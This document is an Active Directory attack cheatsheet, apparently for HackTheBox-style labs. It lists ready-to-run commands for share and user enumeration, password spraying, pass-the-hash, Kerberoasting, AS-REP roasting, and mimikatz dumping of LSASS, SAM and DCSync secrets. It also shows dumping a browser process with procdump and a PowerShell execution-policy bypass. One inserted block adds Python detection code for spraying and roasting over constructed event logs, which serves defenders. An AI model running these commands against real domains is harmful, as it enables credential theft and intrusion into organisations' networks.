Contents
Evil-winrm – (when you have creds)
Crackmapexec – (may be better running in docker)
Secretsdump.py - (extracts creds and secrets – need creds)
GetNPUsers.py - (for ASREP roasting)
Kerbrute - (find valid usernames)
Bloodhound/neo4j/sharphound/bloodhound.py
Suggested websites:
https://www.hackingarticles.in/impacket-guide-smb-msrpc/
------------------------------------------------------------------------------------------------
Enum4linux:
- Enum4linux 10.10.10.10
- Use -h for options: -U = get userlist, -M = get machine list, -o = OS
- -u and -p = to provide credentials
SMBclient:
- smbclient -L 10.10.10.10 (may need the slashes)
- smbclient \\\\10.10.10.10\\sharename
- smbclient \\\\10.10.10.10\\C$ -U 'administrator'
- you can also pass in a domain name – \\\\doozy.local\\
SMBmap:
- smbmap -u anonymous -H 10.10.10.10
- smbmap -u user1 -p password -H 10.10.10.10
Crackmapexec:
- crackmapexec has an ldap flag! – check out: https://wiki.porchetta.industries/ldap-protocol/authentication
Ldapsearch:
- ldapsearch -LLL -x -H ldap://test.local -b '' -s base '(objectclass=*)' - no creds needed
- ldapsearch -h test.local -D 'ldap@test.local' -w password123 -b 'dc=test,dc=local'
Impacket psexec / evil-winrm:
- impacket-psexec username:password@ip - (may need to add '' to the pass)
- impacket-psexec administrator@10.129.210.78 -hashes :823452073d75b9d1cf70ebdf86c7f98e
- evil-winrm -i <ip> -u user -p pass - (may need to add '' to the pass)
- -H = to pass the hash
password spraying:
- crackmapexec smb <ip> -u users.lst -p password1 --continue-on-success
connect:
- crackmapexec smb 10.129.79.75 -u c.smith -p xRxRxPANCAK3SxRxRx - (may need to add '' to the pass)
bruteforce RID:
- cme smb 10.129.221.41 -u hazard -p stealth1agent --rid-brute
Secretsdump:
- secretsdump.py -just-dc-ntlm <domain>/<username>@<ip>
GetNPUsers (AS-REP roasting):
- You do need a list of usernames.
- impacket-GetNPUsers doozy.local/ -dc-ip 10.10.10.10 -usersfile users.list -format john -no-pass
Username enumeration (lookupsid / kerbrute):
- python3 lookupsid.py test.local/john:password123@10.10.10.1
- ./kerbrute_linux_amd64 userenum -d doozy.local --dc 10.10.10.10 /tmp/userlist.txt
Harvesting tickets:
- Rubeus.exe harvest /interval:30
Bruteforce / password spraying:
- Rubeus.exe brute /password:Password1 /noticket
Kerberoasting:
- Rubeus.exe kerberoast
AS-Rep roasting:
- Rubeus.exe asreproast
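Added defensive counterpart to the spraying, Kerberoasting and AS-REP roasting commands above (example code, not from this cheatsheet or its author): the Windows Security events each one leaves on the DC and a minimal detection over constructed sample events. It assumes the events have already been parsed into dicts carrying the EventData field names shown; the threshold and window are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security-log events (not real logs); field names follow EventData names.
EVENTS = [
    # one source failing logons against five accounts in four minutes: spray pattern
    *[{"id": 4625, "ts": f"2024-01-01T10:0{i}:00", "TargetUserName": u, "IpAddress": "10.0.0.5"}
      for i, u in enumerate(["alice", "bob", "carol", "dave", "erin"])],
    # benign noise: one user mistyping their own password twice
    {"id": 4625, "ts": "2024-01-01T10:00:00", "TargetUserName": "frank", "IpAddress": "10.0.0.9"},
    {"id": 4625, "ts": "2024-01-01T10:00:30", "TargetUserName": "frank", "IpAddress": "10.0.0.9"},
    # TGS requests: RC4 (0x17) ticket for an SPN user account vs AES (0x12) for a machine account
    {"id": 4769, "ts": "2024-01-01T10:10:00", "TargetUserName": "alice@TEST.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"id": 4769, "ts": "2024-01-01T10:10:01", "TargetUserName": "alice@TEST.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12"},
    # TGT requests: one without pre-authentication (PreAuthType 0) and RC4, one normal
    {"id": 4768, "ts": "2024-01-01T10:11:00", "TargetUserName": "svc_backup",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"id": 4768, "ts": "2024-01-01T10:11:05", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
]

def detect_spray(events, threshold=5, window=timedelta(minutes=5)):
    """Source IPs with 4625 failures for >= threshold distinct accounts inside one window."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_src[e["IpAddress"]].append((datetime.fromisoformat(e["ts"]), e["TargetUserName"]))
    hits = []
    for src, items in by_src.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            if len({u for t, u in items[i:] if t - t0 <= window}) >= threshold:
                hits.append(src)
                break
    return sorted(hits)

def detect_kerberoast(events):
    """4769 with RC4 encryption for a non-machine, non-krbtgt service: (requester, service)."""
    return sorted({(e["TargetUserName"], e["ServiceName"]) for e in events
                   if e["id"] == 4769 and e["TicketEncryptionType"] == "0x17"
                   and not e["ServiceName"].endswith("$") and e["ServiceName"] != "krbtgt"})

def detect_asrep(events):
    """4768 issued without pre-authentication and RC4-encrypted: accounts at AS-REP roast risk."""
    return sorted({e["TargetUserName"] for e in events
                   if e["id"] == 4768 and e["PreAuthType"] == "0"
                   and e["TicketEncryptionType"] == "0x17"})
```

The RC4 rule is only a useful signal where AES is the domain default; in a legacy RC4-only domain the 4769 check fires on every ticket and the service-account SPN list itself is the better baseline.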
Initial (PowerView):
- powershell -ep bypass
- . .\Powerview.ps1
Enumerate domain users /groups:
- Get-NetUser | select cn
- Get-NetGroup -Groupname *admin*
Shared Folders:
- Invoke-ShareFinder
(thank you to @dw3113r for this cheatsheet)
#Dump LSASS:
- mimikatz privilege::debug
- mimikatz token::elevate
- mimikatz sekurlsa::logonpasswords
#(Over) Pass The Hash
- mimikatz privilege::debug
- mimikatz sekurlsa::pth /user: /ntlm:<> /domain:
#List all available kerberos tickets in memory
- mimikatz sekurlsa::tickets
#Dump local Terminal Services credentials
- mimikatz sekurlsa::tspkg
#Dump and save LSASS in a file
- mimikatz sekurlsa::minidump c:\temp\lsass.dmp
#List cached MasterKeys
- mimikatz sekurlsa::dpapi
#List local Kerberos AES Keys
- mimikatz sekurlsa::ekeys
#Dump SAM Database
- mimikatz lsadump::sam
#Dump SECRETS Database
- mimikatz lsadump::secrets
#Inject and dump the Domain Controller’s Credentials
- mimikatz privilege::debug
- mimikatz token::elevate
- mimikatz lsadump::lsa /inject
#Dump the Domain’s Credentials without touching DC’s LSASS and also remotely
- mimikatz lsadump::dcsync /domain: /all
#List and Dump local kerberos credentials
- mimikatz kerberos::list /dump
#Pass The Ticket
- mimikatz kerberos::ptt
#List TS/RDP sessions
- mimikatz ts::sessions
#List Vault credentials
- mimikatz vault::list
#One Liner Mimikatz - this is if you do not have a fully interactive shell
- .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
Impacket smbserver (refer to the cheatsheets for syntax):
- impacket-smbserver -smb2support -username guest -password guest share /home/kali/doozy
- Bloodhound and neo4j work together and provide a GUI interface
- Start both: bloodhound and neo4j console (provide the creds)
- Sharphound is run on windows
- Bloodhound.py is run from Linux
- Both Sharphound and bloodhound.py produce zip files to be uploaded to the bloodhound GUI
Invoking Bloodhound on windows:
- Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
- Upload Sharphound to any windows box and run it
Mount an SMB share:
- cd /mnt and create a directory with the same name as the SMB share
- sudo mount -t cifs //ip/sharename /mnt/sharenamecopy
with creds:
- sudo mount -t cifs -o 'username=joe,password=joe1' //IP/users /mnt/usernameofperson
Dump a process with procdump:
- upload procdump.exe C:\Users\Chase\Desktop\procdump.exe
- get-process -name firefox (as you need the PID)
- .\procdump.exe -ma 5992 firefox.dmp
Convert UTF-16LE output to UTF-8:
- cat <filename> | iconv -f UTF-16LE -t utf-8 (there are other methods)
https://medium.com/@navkang/active-directory-enumeration-and-exploitation-for-beginners-604a32f45011
https://medium.com/@navkang/attacking-kerberos-e2b1be3dbbe9
https://medium.com/@navkang/post-exploitation-windows-ad-2e608c7858dc
Check out the ippsec.rocks website:
- forest, sauna, sizzle